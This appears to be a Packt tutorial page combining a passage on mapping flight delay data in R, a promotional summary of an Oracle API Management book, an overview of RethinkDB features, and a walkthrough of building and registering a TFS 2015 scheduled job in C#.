Later, we will have the chance to disprove or support this statement either by analyzing the generated plots, or by building some geo-spatial models—some of these will be discussed later, in the Spatial Statistics section. Contour lines First, let's expand our data points into a matrix with the fields package. The size of the resulting R object is defined arbitrarily but, for the given number of rows and columns, which should be a lot higher to generate higher resolution images, 256 is a good start: > library(fields) > out <- as.image(dt$ArrDelay, x = dt[, c('lon', 'lat')], + nrow = 256, ncol = 256) The as.image function generates a special R object, which in short includes a 3‑dimensional matrix-like data structure, where the x and y axes represent the longitude and latitude ranges of the original data respectively. To simplify this even more, we have a matrix with 256 rows and 256 columns, where each of those represents a discrete value evenly distributed between the lowest and highest values of the latitude and longitude. And on the z axis, we have the ArrDelay values—which are in most cases of course missing: > table(is.na(out$z)) FALSE TRUE 112 65424 What does this matrix look like? It's better to see what we have at the moment: > image(out) Well, this does not seem to be useful at all. What is shown there? We rendered the x and y dimensions of the matrix with z colors here, and most tiles of this map are empty due to the high amount of missing values in z. Also, it's pretty straightforward now that the dataset included many airports outside the USA as well. How does it look if we focus only on the USA? > image(out, xlim = base::range(map_data$x, na.rm = TRUE), + ylim = base::range(map_data$y, na.rm = TRUE)) An alternative and more elegant approach to rendering only the US part of the matrix would be to drop the non-US airports from the database before actually creating the out R object. 
Although we will continue with this example for didactic purposes, with real data make sure you concentrate on the target subset of your data instead of trying to smooth and model unrelated data points as well. A lot better! So we have our data points as a tile, now let's try to identify the slope of these mountain peaks, to be able to render them on a future map. This can be done by smoothing the matrix: > look <- image.smooth(out, theta = .5) > table(is.na(look$z)) FALSE TRUE 14470 51066 As can be seen in the preceding table, this algorithm successfully eliminated many missing values from the matrix. The image.smooth function basically reused our initial data point values in the neighboring tiles, and computed some kind of average for the conflicting overrides. This smoothing algorithm results in the following arbitrary map, which does not respect any political or geographical boundaries: > image(look) It would be really nice to plot these artificial polygons along with the administrative boundaries, so let's clear out all cells that do not belong to the territory of the USA. We will use the point.in.polygon function from the sp package to do so: > usa_data <- map('usa', plot = FALSE, region = 'main') > p <- expand.grid(look$x, look$y) > library(sp) > n <- which(point.in.polygon(p$Var1, p$Var2, + usa_data$x, usa_data$y) == 0) > look$z[n] <- NA In a nutshell, we have loaded the main polygon of the USA without any sub-administrative areas, and verified our cells in the look object, if those are overlapping the polygon. Then we simply reset the value of the cell, if not. 
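The masking step can be sketched outside R as well. The following Python example is a minimal illustration, assuming a simple even-odd (ray casting) test; it is not how the sp package implements point.in.polygon, and unlike that function it does not report points on an edge or vertex separately. The square polygon and the small grid are made-up test data:

```python
def point_in_polygon(px, py, xs, ys):
    """Return True if (px, py) lies inside the polygon with vertices (xs, ys).

    Uses the even-odd rule: count how many polygon edges a horizontal ray
    starting at the point crosses. Points exactly on the boundary are not
    handled specially in this sketch.
    """
    inside = False
    j = len(xs) - 1
    for i in range(len(xs)):
        xi, yi, xj, yj = xs[i], ys[i], xs[j], ys[j]
        # Only edges that straddle the point's y value can be crossed.
        if (yi > py) != (yj > py):
            x_cross = xi + (py - yi) * (xj - xi) / (yj - yi)
            if px < x_cross:
                inside = not inside
        j = i
    return inside


# Illustrative data: a 4 x 4 square and a grid that extends beyond it.
square_x = [0.0, 4.0, 4.0, 0.0]
square_y = [0.0, 0.0, 4.0, 4.0]
grid = {(x, y): 1.0 for x in range(-1, 6) for y in range(-1, 6)}

# Reset every cell outside the polygon, like look$z[n] <- NA above.
masked = {
    cell: (value if point_in_polygon(cell[0], cell[1], square_x, square_y) else None)
    for cell, value in grid.items()
}
print(sum(value is not None for value in masked.values()), "cells kept")
```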
The next step is to render the boundaries of the USA, plot our smoothed contour plot, then add some eye-candy in the means of the US states and, the main point of interest, the airport: > map("usa") > image(look, add = TRUE) > map("state", lwd = 3, add = TRUE) > title('Arrival delays of flights from Houston') > points(dt$lon, dt$lat, pch = 19, cex = .5) > points(h$lon, h$lat, pch = 13) Now this is pretty neat, isn't it? Voronoi diagrams An alternative way of visualizing point data with polygons is to generate Voronoi cells between them. In short, the Voronoi map partitions the space into regions around the data points by aligning all parts of the map to one of the regions to minimize the distance from the central data points. This is extremely easy to interpret, and also to implement in R. The deldir package provides a function with the very same name for Delaunay triangulation: > library(deldir) > map("usa") > plot(deldir(dt$lon, dt$lat), wlines = "tess", lwd = 2, + pch = 19, col = c('red', 'darkgray'), add = TRUE) Here, we represented the airports with red dots, as we did before, but also added the Dirichlet tessellation (Voronoi cells) rendered as dark-gray dashed lines. For more options on how to fine-tune the results, see the plot.deldir method. In the next section, let's see how to improve this plot by adding a more detailed background map to it. Satellite maps There are many R packages on CRAN that can fetch data from Google Maps, Stamen, Bing, or OpenStreetMap—even some of the packages we previously used in this article, like the ggmap package, can do this. Similarly, the dismo package also comes with both geo-coding and Google Maps API integration capabilities, and there are some other packages focused on that latter, such as the RgoogleMaps package. Now we will use the OpenStreetMap package, mainly because it supports not only the awesome OpenStreetMap database back-end, but also a bunch of other formats as well. 
For example, we can render really nice terrain maps via Stamen: > library(OpenStreetMap) > map <- openmap(c(max(map_data$y, na.rm = TRUE), + min(map_data$x, na.rm = TRUE)), + c(min(map_data$y, na.rm = TRUE), + max(map_data$x, na.rm = TRUE)), + type = 'stamen-terrain') So we defined the upper-left and lower-right corners of the map we need, and also specified the map style to be a terrain map. As the data by default arrives from the remote servers in the Mercator projection, we first have to transform it to WGS84 (which we used previously), so that we can render the points and polygons on top of the fetched map: > map <- openproj(map, + projection = '+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs') And it's showtime at last: > plot(map) > plot(deldir(dt$lon, dt$lat), wlines = "tess", lwd = 2, + col = c('red', 'black'), pch = 19, cex = 0.5, add = TRUE) This looks a lot better than the outline map we created previously. Now you can try some other map styles as well, such as mapquest-aerial, or some of the really nice-looking cloudMade designs. Interactive maps Besides being able to use web services to download map tiles for the background of the maps created in R, we can also rely on some of those services to generate truly interactive maps. One of the best-known related services is the Google Visualization API, which provides a platform for hosting visualizations made by the community; you can also use it to share maps you've created with others. Querying Google Maps In R, you can access this API via the googleVis package written and maintained by Markus Gesmann and Diego de Castillo. Most functions of the package generate HTML and JavaScript code that we can directly view in a web browser as an SVG object with the base plot function; alternatively, we can integrate them in a web page, for example via the IFRAME HTML tag.
The gvisIntensityMap function takes a data.frame with country ISO or USA state codes and the actual data to create a simple intensity map. We will use the cancels dataset we created in the Finding Polygon Overlays of Point Data section but, before that, we have to do some data transformations. Let's add the state name as a new column to the data.frame, and replace the missing values with zero: > cancels$state <- rownames(cancels) > cancels$Cancelled[is.na(cancels$Cancelled)] <- 0 Now it's time to load the package and pass the data along with a few extra parameters, signifying that we want to generate a state-level US map: > library(googleVis) > plot(gvisGeoChart(cancels, 'state', 'Cancelled', + options = list( + region = 'US', + displayMode = 'regions', + resolution = 'provinces'))) The package also offers opportunities to query the Google Map API via the gvisMap function. We will use this feature to render the airports from the dt dataset as points on a Google Map with an auto-generated tooltip of the variables. But first, as usual, we have to do some data transformations again. The location argument of the gvisMap function takes the latitude and longitude values separated by a colon: > dt$LatLong <- paste(dt$lat, dt$lon, sep = ':') We also have to generate the tooltips as a new variable, which can be done easily with an apply call. We will concatenate the variable names and actual values separated by a HTML line break: > dt$tip <- apply(dt, 1, function(x) + paste(names(dt), x, collapse = '<br/ >')) And now we just pass these arguments to the function for an instant interactive map: > plot(gvisMap(dt, 'LatLong', tipvar = 'tip')) Another nifty feature of the googleVis package is that you can easily merge the different visualizations into one by using the gvisMerge function. The use of this function is quite simple: specify any two gvis objects you want to merge, and also whether they are to be placed horizontally or vertically. 
JavaScript mapping libraries The great success of the trending JavaScript data visualization libraries is only partly due to their great design. I suspect other factors also contribute to the general spread of such tools: it's very easy to create and deploy full-blown data models, especially since the release and ongoing development of Mike Bostock's D3.js. There are also many really useful and smart R packages that interact directly with D3 and topojson (see for example my R user activity compilation at http://bit.ly/countRies), but here we will focus only on how to use Leaflet, probably the most used JavaScript library for interactive maps. What I truly love in R is that there are many packages wrapping other tools, so that R users can rely on only one programming language, and we can easily use C++ programs and Hadoop MapReduce jobs or build JavaScript-powered dashboards without actually knowing anything about the underlying technology. This is especially true when it comes to Leaflet! There are at least two very nice packages that can generate a Leaflet plot from the R console, without a single line of JavaScript. The Leaflet reference class of the rCharts package was developed by Ramnath Vaidyanathan, and includes some methods to create a new object, set the viewport and zoom level, add some points or polygons to the map, and then render or print the generated HTML and JavaScript code to the console or to a file. Unfortunately, this package is not on CRAN yet, so you have to install it from GitHub: > devtools::install_github('ramnathv/rCharts') As a quick example, let's generate a Leaflet map of the airports with some tooltips, like we did with the Google Maps API in the previous section.
As the setView method expects numeric geo-coordinates as the center of the map, we will use Kansas City's airport as a reference: > library(rCharts) > map <- Leaflet$new() > map$setView(as.numeric(dt[which(dt$Dest == 'MCI'), + c('lat', 'lon')]), zoom = 4) > for (i in 1:nrow(dt)) + map$marker(c(dt$lat[i], dt$lon[i]), bindPopup = dt$tip[i]) > map$show() Similarly, RStudio's leaflet package and the more general htmlwidgets package also provide some easy ways to generate JavaScript-powered data visualizations. Let's load the library and define the steps one by one using the pipe operator from the magrittr package, which is pretty standard for all packages created or inspired by RStudio or Hadley Wickham: > library(leaflet) > leaflet(us) %>% + addProviderTiles("Acetate.terrain") %>% + addPolygons() %>% + addMarkers(lng = dt$lon, lat = dt$lat, popup = dt$tip) I especially like this latter map, as we can load a third-party satellite map in the background, then render the states as polygons; we also added the original data points along with some useful tooltips on the very same map with literally a one-line R command. We could even color the state polygons based on the aggregated results we computed in the previous sections! Ever tried to do the same in Java? Alternative map designs Besides being able to use some third-party tools, another main reason why I tend to use R for all my data analysis tasks is that R is extremely powerful in creating custom data exploration, visualization, and modeling designs. As an example, let's create a flow-map based on our data, where we will highlight the flights from Houston based on the number of actual and cancelled flights. We will use lines and circles to render these two variables on a 2-dimensional map, and we will also add a contour plot in the background based on the average time delay. But, as usual, let's do some data transformations first! 
To keep the number of flows to a minimum, let's finally get rid of the airports outside the USA: > dt <- dt[point.in.polygon(dt$lon, dt$lat, + usa_data$x, usa_data$y) == 1, ] We will need the diagram package (to render curved arrows from Houston to the destination airports) and the scales package to create transparent colors: > library(diagram) > library(scales) Then let's render the contour map described in the Contour Lines section: > map("usa") > title('Number of flights, cancellations and delays from Houston') > image(look, add = TRUE) > map("state", lwd = 3, add = TRUE) And then add a curved line from Houston to each of the destination airports, where the width of the line represents the number of cancelled flights and the diameter of the target circles shows the number of actual flights: > for (i in 1:nrow(dt)) { + curvedarrow( + from = rev(as.numeric(h)), + to = as.numeric(dt[i, c('lon', 'lat')]), + arr.pos = 1, + arr.type = 'circle', + curve = 0.1, + arr.col = alpha('black', dt$N[i] / max(dt$N)), + arr.length = dt$N[i] / max(dt$N), + lwd = dt$Cancelled[i] / max(dt$Cancelled) * 25, + lcol = alpha('black', + dt$Cancelled[i] / max(dt$Cancelled))) + } Well, this article ended up being about visualizing spatial data, and not really about analyzing spatial data by fitting models and filtering raw data.



Packt

29 Sep 2015

5 min read

Oracle API Management Implementation 12c


This article by Luis Augusto Weir, one of the authors of the book Oracle API Management 12c Implementation, gives you the gist of what the book covers.

Today, digital transformation is essential to any business strategy, regardless of the industry an organization belongs to. Companies that embark on a journey of digital transformation become able to create innovative and disruptive solutions and to deliver a much richer, more unified, and more personalized user experience at lower cost. These organizations are able to address customers dynamically and across a wide variety of channels, such as mobile applications, highly responsive websites, and social networks. Ultimately, companies that align their business models with digital innovation acquire a considerable competitive advantage over those that do not.

The main trigger for this transformation is the ability to expose and make available the key business information and technological capabilities it requires, which are often buried in the organization's enterprise information systems (EIS) or in integration components that are only visible internally. In the digital economy, it is highly desirable to expose those assets in a standardized way through APIs and, of course, in a controlled, scalable, and secure environment. The lightweight nature of these APIs and the ease of finding and using them greatly facilitate their adoption as the essential mechanism for exposing and consuming features across a multichannel environment.

API Management is the discipline that governs the development cycle of APIs, defining the tools and processes needed to build, publish, and operate them, including the management of the developer communities around them. Our recent book, Oracle API Management 12c Implementation (Luis Weir, Andrew Bell, Rolando Carrasco, Arturo Viveros), is a comprehensive and detailed guide to implementing API Management in an organization.
In the book, the authors explain in great detail how this discipline relates to concepts such as SOA Governance and DevOps. The convergence of API Management with SOA and the governance of such services receives particular attention, in order to explain and shape the concept of Application Services Governance (ASG). The book also features case studies based on real scenarios, with multiple examples that demonstrate how to correctly define and implement a robust strategy supported by the Oracle API Management solution.

The book begins by describing a number of key concepts of API Management and putting complementary disciplines, such as SOA Governance, DevOps, and Enterprise Architecture (EA), into context, in order to clear up any confusion about how these topics relate to one another. All these concepts are then put into practice through the case study of a named organization that previously implemented a service-oriented architecture, including its governance, successfully, and that now has the need and the opportunity to extend its technology platform by implementing an API Management strategy. Throughout the narrative of the case, the following are also described:

- The business requirements that justify the adoption of API Management
- The potential impact of the proposed solution on the organization
- The steps required to design and implement the strategy
- The definition and implementation of the maturity assessment (API Readiness) and the gap analysis in terms of people, tools, and technology
- The product evaluation and selection exercise, explaining the choice of Oracle as the most appropriate solution
- The API Management implementation roadmap

In later chapters, the steps needed to solve the scenario are addressed one by one by implementing a reference architecture for API Management based on the components of the Oracle solution: Oracle API Catalog, Oracle API Manager, and Oracle API Gateway.
In short, the book will enable the reader to acquire advanced knowledge of the following topics:

- API Management: its definition, concepts, and objectives
- Differences and similarities between API Management and SOA Governance; where and how these two disciplines converge in the concept of Application Services Governance (ASG), and how to define a framework aimed at ASG
- Definition and implementation of the maturity assessment for API Management
- Criteria for the selection and evaluation of tools; why Oracle API Management Suite?
- Implementation of Oracle API Catalog (OAC), including OAC harvesting with bootstrapping, ANT scripts, and JDev; the OAC Console; user creation and management; API metadata; API Discovery; and how to extend the functionality of OAC through the REX API
- API management in general and its challenges
- Implementation of Oracle API Manager (OAPIM), including the creation, publishing, monitoring, subscription, and life cycle management of APIs through the OAPIM Portal
- Common scenarios for the adoption and implementation of API Management and how to solve them
- Implementation of Oracle API Gateway (OAG), including the creation of policies with different filters, OAuth authentication, integration with LDAP, SOAP/REST API conversions, and testing
- Defining the deployment topology for Oracle API Management Suite
- Installing and configuring OAC, OAPIM, and OAG 12c

Oracle API Management 12c Implementation is designed for the following audience: enterprise architects, solution architects, technical leaders, and SOA and API professionals who want to know the Oracle API Management solution thoroughly and implement it successfully.

Summary

In this article, we looked at Oracle API Management 12c Implementation in brief. More information is provided in the book.


How-To Tutorials


Packt

29 Sep 2015

16 min read

Designing and Building a vRealize Automation 6.2 Infrastructure


Packt

29 Sep 2015

27 min read

Lights and Effects


Jonathan Pollack

28 Sep 2015

6 min read

Learning RethinkDB


RethinkDB is a relatively new, fully open-source NoSQL database, featuring ridiculously easy sharding, replication, and database management; table joins (that’s right!); geospatial and time-series support; and real-time monitoring of complicated queries. I think the feature list alone makes this a piece of tech worth looking further into, to say nothing of the fact that we’ll likely be seeing an explosion of apps that use RethinkDB as their fundamental database. So, developers, get ready to learn about yet another database. That said, like any tool, you should consult your doctor when deciding if RethinkDB is right for you.

When to avoid

Like most NoSQL offerings, RethinkDB makes a few conscious trade-offs in its design, most notably when it comes to ACID compliance and the CAP theorem. If you need a fully ACID-compliant database, or strong type checking across your schema, you would be better served by a traditional SQL database. If you absolutely need write availability over data consistency, look elsewhere: RethinkDB favors consistency. Also, because of how queries are performed and returned, “big data” use cases are probably not a great fit for this database, specifically if you want to handle results larger than 64 MB or are performing computationally intensive work on your stored data.

When to consider

- You want a great web-based management console for data-center configuration (sharding, replication, etc.), database monitoring, and testing queries.
- You want the flexibility of a schema-less database, with the ability to easily express relationships via table joins.
- You need to perform geospatial queries (e.g. find all documents with locations within 5 km of a given point).
- You deal with time-series data, especially across various time zones.
- You need to push data to your client based on real-time changes to your data, as a result of complex queries.
Management console

The web console is insanely easy to use, and gives you all of the control you need for administering your data-center, even if it is only a data-center of one database. Setting up a data-center is just a matter of pointing your new database to an existing node in a cluster. Once that’s done, you can use the web console to shard (and re-shard) your data, as well as determine how many replicas you want floating around. You can also run queries (and profile those queries) against your databases straight from the web console, giving you quick access to your data and performance.

Table joins (capturing data relations)

One of the best pieces of syntactic sugar that RethinkDB provides, in my opinion, is the ability to do table joins. Certainly, this isn’t that magical: what we’re doing is essentially a nested query that uses a specified field as the primary key for the nested lookup. Still, it really does make queries easy to read and compose.

    r.table("table1").eq_join("doc_field_as_table2_primary_key", r.table("table2")).zip().run()

Even more awesomely, the JavaScript ORM Thinky allows for very slick, seamless query-level joins, based on the same principle.

Geospatial primitives

Given that location-aware queries are becoming more and more popular, if not downright necessary, it’s great to see that RethinkDB comes with support for the following geometric primitives: point, line, polygon (at least 3 sides), circle, and polygonSub (subtract one polygon from a larger, enclosing polygon). It allows for the following types of queries: distance, intersects, includes, getIntersecting, and getNearest. For example, you can find all of the documents within 5 km of Greenwich, England.
    r.table("table1").getNearest(r.point(0, 51.48), {index: "table1_geo_index", maxDist: 5, unit: "km"}).run()

Note that r.point takes the longitude first and the latitude second.

Time-series support (sane date & time primitives)

Official drivers do native conversions for you, which means you can make timezone-aware queries that find documents that occurred at a given time on a given day in a given timezone. Some other cool features: times can be used as indexes, and time operations are handled on the database, allowing them to be executed across the cluster effortlessly. Take, for example, the desire to figure out how many customer support tickets came in between 9 am and 5 pm every day. We don’t want to have to figure out how to offset the timestamp on each document, given that the timezones could each be different. Thankfully, RethinkDB will do this accounting, and spread out the computation across the cluster without asking us for a thing.

    r.table('customer-support-tickets').filter(function (ticket) {
      // hours() is evaluated in the timezone stored with each ticket's time
      return ticket('time').hours().ge(9).and(
        ticket('time').hours().lt(17));
    }).count().run();

Realtime query result monitoring (change feeds)

By far the most impressive feature of RethinkDB has to be change-feeds. You can turn almost every practical query that you would want to monitor into a live stream of changes just by chaining the function call changes() to the end. For example, monitor the changes to a given table:

    r.table("table1").changes().run()

or to a given query (the ordering of a table, for instance):

    r.table("table1").orderBy("key").changes().run()

And of course, the queries can be made more complicated, but the examples above should blow your mind. No more polling, no more having to come up with the data diffs yourself before pushing them to the client. RethinkDB will do the diff for you, and push the results straight to your server.
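To get a feel for the bookkeeping that change-feeds take off your hands, here is a minimal Python sketch of the manual alternative: poll twice, then diff the two snapshots yourself. It uses no RethinkDB driver at all; `diff_snapshots` and the sample documents are hypothetical, and the result only mimics the old_val/new_val shape of change-feed notifications.

```python
def diff_snapshots(previous, current):
    """Compare two {id: document} snapshots of a table.

    Returns one {"old_val": ..., "new_val": ...} entry per document that was
    inserted (old_val is None), deleted (new_val is None), or modified.
    """
    changes = []
    for doc_id in sorted(previous.keys() | current.keys()):
        old_val = previous.get(doc_id)
        new_val = current.get(doc_id)
        if old_val != new_val:
            changes.append({"old_val": old_val, "new_val": new_val})
    return changes


# Two made-up polling results for the same table.
before = {1: {"id": 1, "status": "open"}, 2: {"id": 2, "status": "open"}}
after = {1: {"id": 1, "status": "closed"}, 3: {"id": 3, "status": "open"}}

for change in diff_snapshots(before, after):
    print(change)
```

Even this toy version has to hold a full copy of the previous result and rescan everything on every poll, which is exactly the work you would rather leave to the database.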
There is one caveat here, however: while change-feeds are decent on the order of 10 clients, it is more efficient to couple them to a pub-sub service when pushing to many clients.

Conclusion

RethinkDB has a lot of cool things to be excited about: ReQL (its readable, highly functional syntax), cluster management, primitives for 21st century applications, and change-feeds. And you know what, if RethinkDB only had change-feeds, I would still be extremely excited about it. Think of all the time you no longer have to spend banging your head against the wall trying to deal with consistency and concurrency issues! If you are thinking about starting a new project, or are tired of fighting with your current NoSQL database, and don’t have any requirements in the “avoid” camp, you should seriously consider using RethinkDB.

About the author

Jonathan Pollack is a full stack developer living in Berlin. He previously worked as a web developer at a public shoe company, and prior to that, worked at a startup that’s trying to build the world’s best pan-cloud virtualization layer. He can be found on Twitter @murphydanger.


How-To Tutorials


Packt

28 Sep 2015

12 min read

Creating TFS Scheduled Jobs


In this article by Gordon Beeming, the author of the book Team Foundation Server 2015 Customization, we are going to cover TFS scheduled jobs. The topics that we are going to cover include:

- Writing a TFS job
- Deploying a TFS job
- Removing a TFS job

You would want to write a scheduled job for any logic that needs to run at specific times, whether at certain intervals or at specific times of the day. A scheduled job is not the place to put logic that you would like to run as soon as some other event, such as a check-in or a work item change, occurs. The job we write in this article will automatically link changesets to work items based on the check-in comments.

The project setup

First off, we'll start with our project setup. This time, we'll create a Windows console application.

[Figure: Creating a new Windows console application]

The references that we'll need this time around are:

- Microsoft.VisualStudio.Services.WebApi.dll
- Microsoft.TeamFoundation.Common.dll
- Microsoft.TeamFoundation.Framework.Server.dll

All of these can be found in C:\Program Files\Microsoft Team Foundation Server 14.0\Application Tier\TFSJobAgent on the TFS server. That's all the setup that is required for your TFS job project. Any class that implements ITeamFoundationJobExtension can be used as a TFS job.

Writing the TFS job

So, as mentioned, we are going to need a class that implements ITeamFoundationJobExtension. Let's create a class called TfsCommentsToChangeSetLinksJob and have it implement ITeamFoundationJobExtension.
As part of this, we will need to implement the Run method, which is part of the interface, like this:

    public class TfsCommentsToChangeSetLinksJob : ITeamFoundationJobExtension
    {
        public TeamFoundationJobExecutionResult Run(
            TeamFoundationRequestContext requestContext,
            TeamFoundationJobDefinition jobDefinition,
            DateTime queueTime,
            out string resultMessage)
        {
            throw new NotImplementedException();
        }
    }

Then, we also add the using directive:

    using Microsoft.TeamFoundation.Framework.Server;

Now, for this specific extension, we'll need to add references to the following:

- Microsoft.TeamFoundation.Client.dll
- Microsoft.TeamFoundation.VersionControl.Client.dll
- Microsoft.TeamFoundation.WorkItemTracking.Client.dll

All of these can be found in C:\Program Files\Microsoft Team Foundation Server 14.0\Application Tier\TFSJobAgent.

Now, for the logic of our plugin, we use the following code inside the Run method as a basic shell, into which we'll then place the specific logic for this plugin. The shell wraps the work in a try/catch block; at the end of the try block, it reports a successful job run. If an exception is thrown, the catch block appends it to the job message and reports that the job failed:

    resultMessage = string.Empty;
    try
    {
        // place logic here
        return TeamFoundationJobExecutionResult.Succeeded;
    }
    catch (Exception ex)
    {
        resultMessage += "Job Failed: " + ex.ToString();
        return TeamFoundationJobExecutionResult.Failed;
    }

Along with this code, you will need the following using directives:

    using Microsoft.TeamFoundation;
    using Microsoft.TeamFoundation.Client;
    using Microsoft.TeamFoundation.VersionControl.Client;
    using Microsoft.TeamFoundation.WorkItemTracking.Client;
    using System.Linq;
    using System.Text.RegularExpressions;

So next, we need to place some logic specific to this job in the try block.
First, let's create a connection to TFS for version control:

    TfsTeamProjectCollection tfsTPC =
        TfsTeamProjectCollectionFactory.GetTeamProjectCollection(
            new Uri("http://localhost:8080/tfs"));
    VersionControlServer vcs = tfsTPC.GetService<VersionControlServer>();

Then, we get the work item store and query the version control history for the last 25 check-ins:

    WorkItemStore wis = tfsTPC.GetService<WorkItemStore>();
    // get the last 25 check-ins
    foreach (Changeset changeSet in vcs.QueryHistory("$/", RecursionType.Full, 25))
    {
        // place the next logic here
    }

Now that we have the changeset history, we are going to check the comments for any references to work items using a simple regular expression:

    // try to match the regex for a hash number in the comment
    foreach (Match match in Regex.Matches(
        (changeSet.Comment ?? string.Empty), @"#\d{1,}"))
    {
        // place the next logic here
    }

Once we are inside this loop, we know that we have found a valid number in the comment and that we should attempt to link the check-in to that work item.
But the fact that we have found a number doesn't mean that the work item exists, so let's try to find a work item with that number:

    int workItemId = Convert.ToInt32(match.Value.TrimStart('#'));
    var workItem = wis.GetWorkItem(workItemId);
    if (workItem != null)
    {
        // place the next logic here
    }

Here, we make sure that the work item exists. If the workItem variable is not null, we proceed to check whether a link between this changeSet and workItem already exists:

    // now create the link
    ExternalLink changesetLink = new ExternalLink(
        wis.RegisteredLinkTypes[ArtifactLinkIds.Changeset],
        changeSet.ArtifactUri.AbsoluteUri);
    // you should verify if such a link already exists
    if (!workItem.Links.OfType<ExternalLink>()
        .Any(l => l.LinkedArtifactUri == changeSet.ArtifactUri.AbsoluteUri))
    {
        // place the next logic here
    }

If a link does not exist, then we can add a new link:

    changesetLink.Comment = "Change set " +
        $"'{changeSet.ChangesetId}'" +
        " auto linked by a server plugin";
    workItem.Links.Add(changesetLink);
    workItem.Save();
    resultMessage += $"Linked CS:{changeSet.ChangesetId} " +
        $"to WI:{workItem.Id}";

The only extra step here is fetching the last 25 change sets. If you were using this in production, you would probably want to store the last change set that you processed and then get history up until that point, but that isn't needed to illustrate this sample. After getting the list of change sets, we process each one exactly as before. We check whether there is a comment and whether that comment contains a hash number that we can try linking to the change set. We then check whether a work item exists for the number that we found. Next, we add a link to the work item from the change set. Then, for each link, we append to the overall resultMessage string so that when we look at the results of our job run, we can see which links were added automatically for us.
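The comment-scanning step can be tried in isolation, away from a TFS server. The article's own code is C#; the sketch below restates only the hash-number matching in JavaScript as a quick runnable illustration. The function name extractWorkItemIds is hypothetical and not part of any TFS API.

```javascript
// Sketch only: mirrors the "#<digits>" matching used by the job above.
// extractWorkItemIds is a hypothetical helper, not a TFS API.
function extractWorkItemIds(comment) {
  // Treat a missing comment as an empty string, as the C# code does.
  const matches = (comment || '').match(/#\d+/g) || [];
  // Drop the leading '#' and convert each match to a number.
  return matches.map(function (m) {
    return parseInt(m.slice(1), 10);
  });
}

console.log(extractWorkItemIds('Fixes #42 and #7'));
```

As in the job itself, finding a number only yields a candidate ID; whether a work item with that ID exists still has to be checked against the work item store.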
As you can see, with this approach, we don't interfere with the check-in itself but instead link change sets to work items out-of-band, at a later stage.

Deploying our TFS Job

Deploying the code is very simple; change the project's Output type to Class Library. This can be done by going to the project properties, where you will see an Output type drop-down list in the Application tab. Now, build your project. Then, copy the TfsJobSample.dll and TfsJobSample.pdb output files to the scheduled job plugins folder, which is C:\Program Files\Microsoft Team Foundation Server 14.0\Application Tier\TFSJobAgent\Plugins. Unfortunately, simply copying the files into this folder won't install your scheduled job automatically, because the scheduled job interface doesn't specify when the job should run. Instead, you register the job as a separate step. Change Output type back to Console Application for the next step. You can, and should, split the TFS job and its installer into different projects, but in our sample, we'll use the same one.

Registering, queueing, and deregistering a TFS Job

If you try to install the job the way you used to in TFS 2013, you will now get the TF400444 error:

    TF400444: The creation and deletion of jobs is no longer supported. You may only update the EnabledState or Schedule of a job. Failed to create, delete or update job id 5a7a01e0-fff1-44ee-88c3-b33589d8d3b3

This is because some changes were made to the job service for security reasons, and these changes prevent you from using the Client Object Model. You are now forced to use the Server Object Model. The code that you have to write is slightly more complicated and requires you to copy your executable to multiple locations to get it working properly. Place all of the following code in your program.cs file inside the main method.
We start off by getting some arguments that are passed through to the application, and if we don't get at least one argument, we don't continue:

    #region Collect commands from the args
    if (args.Length != 1 && args.Length != 2)
    {
        Console.WriteLine("Usage: TfsJobSample.exe <command " +
            "(/r, /i, /u, /q)> [job id]");
        return;
    }
    string command = args[0];
    Guid jobid = Guid.Empty;
    if (args.Length > 1)
    {
        if (!Guid.TryParse(args[1], out jobid))
        {
            Console.WriteLine("Job Id not a valid Guid");
            return;
        }
    }
    #endregion

We then wrap all our logic in a try-catch block, and in our catch, we only write out the exception that occurred:

    try
    {
        // place logic here
    }
    catch (Exception ex)
    {
        Console.WriteLine(ex.ToString());
    }

Place the next steps inside the try block, unless asked to do otherwise. As part of using the Server Object Model, you'll need to create a DeploymentServiceHost. This requires you to have a connection string to the TFS Configuration database, so make sure that the connection string set in the following is valid for you.
We also need some other generic path information, so we'll mimic what we could expect the job agent's paths to be:

    #region Build a DeploymentServiceHost
    string databaseServerDnsName = "localhost";
    string connectionString = $"Data Source={databaseServerDnsName};" +
        "Initial Catalog=TFS_Configuration;Integrated Security=true;";
    TeamFoundationServiceHostProperties deploymentHostProperties =
        new TeamFoundationServiceHostProperties();
    deploymentHostProperties.HostType =
        TeamFoundationHostType.Deployment | TeamFoundationHostType.Application;
    deploymentHostProperties.Id = Guid.Empty;
    deploymentHostProperties.PhysicalDirectory =
        @"C:\Program Files\Microsoft Team Foundation Server 14.0" +
        @"\Application Tier\TFSJobAgent";
    deploymentHostProperties.PlugInDirectory =
        $@"{deploymentHostProperties.PhysicalDirectory}\Plugins";
    deploymentHostProperties.VirtualDirectory = "/";
    ISqlConnectionInfo connInfo =
        SqlConnectionInfoFactory.Create(connectionString, null, null);
    DeploymentServiceHost host =
        new DeploymentServiceHost(deploymentHostProperties, connInfo, true);
    #endregion

Now that we have a TeamFoundationServiceHost, we are able to create a TeamFoundationRequestContext.
We'll need it to call methods such as UpdateJobDefinitions, which adds and/or removes our job, and QueryJobDefinition, which is used to queue our job outside of any schedule:

    using (TeamFoundationRequestContext requestContext =
        host.CreateSystemContext())
    {
        TeamFoundationJobService jobService =
            requestContext.GetService<TeamFoundationJobService>();
        // place next logic here
    }

We then create a new TeamFoundationJobDefinition instance with all of the information that we want for our TFS job, including the name, schedule, and enabled state:

    var jobDefinition = new TeamFoundationJobDefinition(
        "Comments to Change Set Links Job",
        "TfsJobSample.TfsCommentsToChangeSetLinksJob");
    jobDefinition.EnabledState = TeamFoundationJobEnabledState.Enabled;
    jobDefinition.Schedule.Add(new TeamFoundationJobSchedule
    {
        ScheduledTime = DateTime.Now,
        PriorityLevel = JobPriorityLevel.Normal,
        Interval = 300,
    });

Once we have the job definition, we check what the command was and then execute the code that relates to that command. For the /r command, we will just run our TFS job outside of the TFS job agent:

    if (command == "/r")
    {
        string resultMessage;
        new TfsCommentsToChangeSetLinksJob().Run(requestContext,
            jobDefinition, DateTime.Now, out resultMessage);
    }

For the /i command, we will install the TFS job:

    else if (command == "/i")
    {
        jobService.UpdateJobDefinitions(requestContext, null,
            new[] { jobDefinition });
    }

For the /u command, we will uninstall the TFS job:

    else if (command == "/u")
    {
        jobService.UpdateJobDefinitions(requestContext,
            new[] { jobid }, null);
    }

Finally, with the /q command, we will queue the TFS job to be run inside the TFS job agent and outside of its schedule:

    else if (command == "/q")
    {
        jobService.QueryJobDefinition(requestContext, jobid);
    }

